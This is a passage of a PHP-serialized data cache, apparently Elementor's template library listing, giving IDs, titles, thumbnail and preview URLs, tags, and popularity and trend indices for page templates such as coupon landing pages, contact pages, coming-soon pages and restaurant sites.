2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-03.png\";s:12:\"tmpl_created\";i:1494352134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:167;s:16:\"popularity_index\";i:552;s:11:\"trend_index\";i:658;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:656;a:14:{s:2:\"id\";i:1570;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 3\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-01.png\";s:12:\"tmpl_created\";i:1494352136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:168;s:16:\"popularity_index\";i:592;s:11:\"trend_index\";i:679;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:657;a:14:{s:2:\"id\";i:1571;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 4\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-04.png\";s:12:\"tmpl_created\";i:1494352138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:169;s:16:\"popularity_index\";i:563;s:11:\"trend_index\";i:708;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:658;a:14:{s:2:\"id\";i:192;s:5:\"title\";s:28:\"Landing Page &#8211; Webinar\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0015.png\";s:12:\"tmpl_created\";i:1470820734;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:170;s:16:\"popularity_index\";i:118;s:11:\"trend_index\";i:322;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:659;a:14:{s:2:\"id\";i:2141;s:5:\"title\";s:32:\"Contact &#8211; Delivery Company\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-contact.png\";s:12:\"tmpl_created\";i:1499774122;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/contact-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:171;s:16:\"popularity_index\";i:324;s:11:\"trend_index\";i:459;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:660;a:14:{s:2:\"id\";i:137;s:5:\"title\";s:22:\"Contact &#8211; Modern\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0013.png\";s:12:\"tmpl_created\";i:1470829828;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/contact-modern/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:172;s:16:\"popularity_index\";i:50;s:11:\"trend_index\";i:254;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:661;a:14:{s:2:\"id\";i:256;s:5:\"title\";s:26:\"Contact &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0011.png\";s:12:\"tmpl_created\";i:1470829796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/contact-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:173;s:16:\"popularity_index\";i:128;s:11:\"trend_index\";i:407;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:662;a:14:{s:2:\"id\";i:2150;s:5:\"title\";s:25:\"Contact &#8211; Cake Shop\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-contact.png\";s:12:\"tmpl_created\";i:1499774127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:174;s:16:\"popularity_index\";i:67;s:11:\"trend_index\";i:314;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:663;a:14:{s:2:\"id\";i:223;s:5:\"title\";s:21:\"Contact &#8211; Hotel\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0002.png\";s:12:\"tmpl_created\";i:1470820471;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/contact-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:175;s:16:\"popularity_index\";i:129;s:11:\"trend_index\";i:476;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:664;a:14:{s:2:\"id\";i:24;s:5:\"title\";s:25:\"Contact &#8211; Corporate\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0012.png\";s:12:\"tmpl_created\";i:1470248619;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-corporate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:176;s:16:\"popularity_index\";i:13;s:11:\"trend_index\";i:46;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:665;a:14:{s:2:\"id\";i:184;s:5:\"title\";s:23:\"Services &#8211; Moving\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0017.png\";s:12:\"tmpl_created\";i:1470829889;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/services-moving/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:177;s:16:\"popularity_index\";i:22;s:11:\"trend_index\";i:82;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:666;a:14:{s:2:\"id\";i:625;s:5:\"title\";s:31:\"Services &#8211; Cake Shop Menu\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2016/12/cake-shop-menu.jpg\";s:12:\"tmpl_created\";i:1481549196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/services-cake-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:178;s:16:\"popularity_index\";i:556;s:11:\"trend_index\";i:577;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:667;a:14:{s:2:\"id\";i:187;s:5:\"title\";s:20:\"Services &#8211; Fun\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0001.png\";s:12:\"tmpl_created\";i:1470829892;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/services-fun/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:179;s:16:\"popularity_index\";i:79;s:11:\"trend_index\";i:356;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:668;a:14:{s:2:\"id\";i:238;s:5:\"title\";s:27:\"Services &#8211; Consulting\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0014.png\";s:12:\"tmpl_created\";i:1470829865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/services-consulting/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:180;s:16:\"popularity_index\";i:21;s:11:\"trend_index\";i:100;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:669;a:14:{s:2:\"id\";i:647;s:5:\"title\";s:33:\"Services &#8211; Coffee Shop Menu\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2016/12/restaurant-menu.jpg\";s:12:\"tmpl_created\";i:1481549320;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-coffee-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:181;s:16:\"popularity_index\";i:454;s:11:\"trend_index\";i:598;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:670;a:14:{s:2:\"id\";i:2138;s:5:\"title\";s:33:\"Services &#8211; Delivery Company\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-services.png\";s:12:\"tmpl_created\";i:1499774119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:182;s:16:\"popularity_index\";i:385;s:11:\"trend_index\";i:532;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:671;a:14:{s:2:\"id\";i:823;s:5:\"title\";s:19:\"Pricing &#8211; App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-app.jpg\";s:12:\"tmpl_created\";i:1485272966;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/pricing-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:183;s:16:\"popularity_index\";i:355;s:11:\"trend_index\";i:402;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:672;a:14:{s:2:\"id\";i:824;s:5:\"title\";s:24:\"Pricing &#8211; Software\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-software.png\";s:12:\"tmpl_created\";i:1485272900;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/pricing-software-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:184;s:16:\"popularity_index\";i:366;s:11:\"trend_index\";i:477;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:673;a:14:{s:2:\"id\";i:825;s:5:\"title\";s:24:\"Product &#8211; Speakers\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/01/product-page.jpg\";s:12:\"tmpl_created\";i:1485272513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/product-speakers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:185;s:16:\"popularity_index\";i:382;s:11:\"trend_index\";i:602;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:674;a:14:{s:2:\"id\";i:245;s:5:\"title\";s:21:\"Product &#8211; Clean\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0020.png\";s:12:\"tmpl_created\";i:1470829876;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/product-clean/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"fast\",\"minimal\",\"minimalistic\",\"seo\",\"simple\"]\";s:10:\"menu_order\";i:186;s:16:\"popularity_index\";i:83;s:11:\"trend_index\";i:232;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:675;a:14:{s:2:\"id\";i:1075;s:5:\"title\";s:19:\"Shop &#8211; Sweets\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Sweets.png\";s:12:\"tmpl_created\";i:1488810871;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/shop-sweets/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:154:\"[\"bakery\",\"beverage\",\"business\",\"cafe\",\"candy bar\",\"catering\",\"delivery service\",\"Food\",\"online shop\",\"pastry\",\"Restaurant\",\"store\",\"sweet shop\",\"sweets\"]\";s:10:\"menu_order\";i:187;s:16:\"popularity_index\";i:58;s:11:\"trend_index\";i:201;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:676;a:14:{s:2:\"id\";i:1051;s:5:\"title\";s:24:\"Blog Post &#8211; Launch\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/post-cloud.png\";s:12:\"tmpl_created\";i:1488810869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blog-post-launch/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:210:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"launch\",\"marketing campaign\",\"marketing landing page\",\"marketing template landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";i:188;s:16:\"popularity_index\";i:17;s:11:\"trend_index\";i:36;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:677;a:14:{s:2:\"id\";i:1245;s:5:\"title\";s:13:\"Coming Soon 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-1.png\";s:12:\"tmpl_created\";i:1491207184;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:189;s:16:\"popularity_index\";i:261;s:11:\"trend_index\";i:341;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:678;a:14:{s:2:\"id\";i:1247;s:5:\"title\";s:13:\"Coming Soon 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-2.png\";s:12:\"tmpl_created\";i:1491207138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:190;s:16:\"popularity_index\";i:32;s:11:\"trend_index\";i:51;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:679;a:14:{s:2:\"id\";i:1248;s:5:\"title\";s:13:\"Coming Soon 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-3.png\";s:12:\"tmpl_created\";i:1491207050;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:191;s:16:\"popularity_index\";i:387;s:11:\"trend_index\";i:422;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:680;a:14:{s:2:\"id\";i:1249;s:5:\"title\";s:13:\"Coming Soon 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-4.png\";s:12:\"tmpl_created\";i:1491207380;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:192;s:16:\"popularity_index\";i:421;s:11:\"trend_index\";i:429;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:681;a:14:{s:2:\"id\";i:1250;s:5:\"title\";s:13:\"Coming Soon 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-5.png\";s:12:\"tmpl_created\";i:1491207450;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:193;s:16:\"popularity_index\";i:70;s:11:\"trend_index\";i:199;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:682;a:14:{s:2:\"id\";i:1260;s:5:\"title\";s:18:\"Maintenance Mode 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-6.png\";s:12:\"tmpl_created\";i:1491207507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:194;s:16:\"popularity_index\";i:451;s:11:\"trend_index\";i:509;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:683;a:14:{s:2:\"id\";i:1261;s:5:\"title\";s:18:\"Maintenance Mode 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/04/Coming-Soon-7.png\";s:12:\"tmpl_created\";i:1491207584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:195;s:16:\"popularity_index\";i:77;s:11:\"trend_index\";i:211;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:684;a:14:{s:2:\"id\";i:1272;s:5:\"title\";s:13:\"Coming Soon 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-8.png\";s:12:\"tmpl_created\";i:1491207674;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:196;s:16:\"popularity_index\";i:288;s:11:\"trend_index\";i:273;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:685;a:14:{s:2:\"id\";i:1279;s:5:\"title\";s:13:\"Coming Soon 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-9.png\";s:12:\"tmpl_created\";i:1491207756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:197;s:16:\"popularity_index\";i:140;s:11:\"trend_index\";i:263;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:686;a:14:{s:2:\"id\";i:1745;s:5:\"title\";s:14:\"Coming Soon 10\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-002.png\";s:12:\"tmpl_created\";i:1494849745;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/coming-soon-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:198;s:16:\"popularity_index\";i:279;s:11:\"trend_index\";i:344;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:687;a:14:{s:2:\"id\";i:1742;s:5:\"title\";s:12:\"Login Page 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-003.png\";s:12:\"tmpl_created\";i:1494849744;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:100:\"https://library.elementor.com/login-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:199;s:16:\"popularity_index\";i:413;s:11:\"trend_index\";i:494;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:688;a:14:{s:2:\"id\";i:1748;s:5:\"title\";s:12:\"Login Page 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-001.png\";s:12:\"tmpl_created\";i:1494849742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/login-page-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:200;s:16:\"popularity_index\";i:295;s:11:\"trend_index\";i:409;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:689;a:14:{s:2:\"id\";i:3963;s:5:\"title\";s:32:\"Restaurant Site &#8211; Homepage\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/01/R.HomepageThumb.png\";s:12:\"tmpl_created\";i:1516284821;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/restaurant-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:201;s:16:\"popularity_index\";i:232;s:11:\"trend_index\";i:286;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:690;a:14:{s:2:\"id\";i:3969;s:5:\"title\";s:28:\"Restaurant Site &#8211; Menu\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/01/R.MenuThumb.png\";s:12:\"tmpl_created\";i:1516284829;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/restaurant-site-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:202;s:16:\"popularity_index\";i:383;s:11:\"trend_index\";i:563;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:691;a:14:{s:2:\"id\";i:3966;s:5:\"title\";s:29:\"Restaurant Site &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/01/R.AboutThumb.png.png\";s:12:\"tmpl_created\";i:1516284839;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/restaurant-site-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:203;s:16:\"popularity_index\";i:255;s:11:\"trend_index\";i:337;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:692;a:14:{s:2:\"id\";i:3972;s:5:\"title\";s:31:\"Restaurant Site &#8211; Contact\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/01/R.ContactThumb.png\";s:12:\"tmpl_created\";i:1516284847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/restaurant-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:204;s:16:\"popularity_index\";i:362;s:11:\"trend_index\";i:492;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:693;a:14:{s:2:\"id\";i:2080;s:5:\"title\";s:27:\"Ski Resort &#8211; Homepage\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Home-Page.png\";s:12:\"tmpl_created\";i:1508161124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:205;s:16:\"popularity_index\";i:334;s:11:\"trend_index\";i:465;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:694;a:14:{s:2:\"id\";i:2088;s:5:\"title\";s:24:\"Ski Resort &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-About.png\";s:12:\"tmpl_created\";i:1508161129;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/ski-resort-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:206;s:16:\"popularity_index\";i:412;s:11:\"trend_index\";i:512;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:695;a:14:{s:2:\"id\";i:2085;s:5:\"title\";s:27:\"Ski Resort &#8211; 